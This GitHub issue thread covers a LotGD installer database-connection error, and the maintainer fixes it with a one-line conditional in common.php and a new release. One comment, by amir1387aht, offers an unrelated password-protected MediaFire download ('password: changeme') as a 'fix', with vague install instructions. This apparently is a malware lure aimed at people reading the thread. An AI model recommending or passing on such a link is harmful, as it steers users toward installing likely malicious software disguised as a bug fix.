### ISSUE TITLE
Critical error while connecting to database: Access denied for user ''@'localhost' (using password: YES)

### ISSUE THREAD

**Issue by Exeden** [NB-Core/lotgd#20]
Going into the installer, I immediately get this error when clicking on Game Installer.  Shouldn't it allow me to configure the DB details first?

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NB-Core** [comment]
Ah... apologies... I didn't see your Issue....

a fix at a later stage of the installer broke the first step it seems....
Add that one Line 149 (I assume you got the latest release, snapshot should also work) before the $link:

141 // If you are running a server that has high overhead to connect to your
142 // database (such as a high latency network connection to mysql),
143 // reversing the commenting of the following two code lines may significantly
144 // increase your overall performance. Pconnect uses more server resources though.
145 // For more details, see
146 // http://php.net/manual/en/features.persistent-connections.php
147 //
148 // Line is important for installer only, step 5
149 if (defined("IS_INSTALLER") && httpget('stage')>4)
150 $link = db_pconnect($DB_HOST, $DB_USER, $DB_PASS);

It should start then. Apologies for the oversight.

<---common.php

**Comment by NB-Core** [comment]
Made a new release with the fix
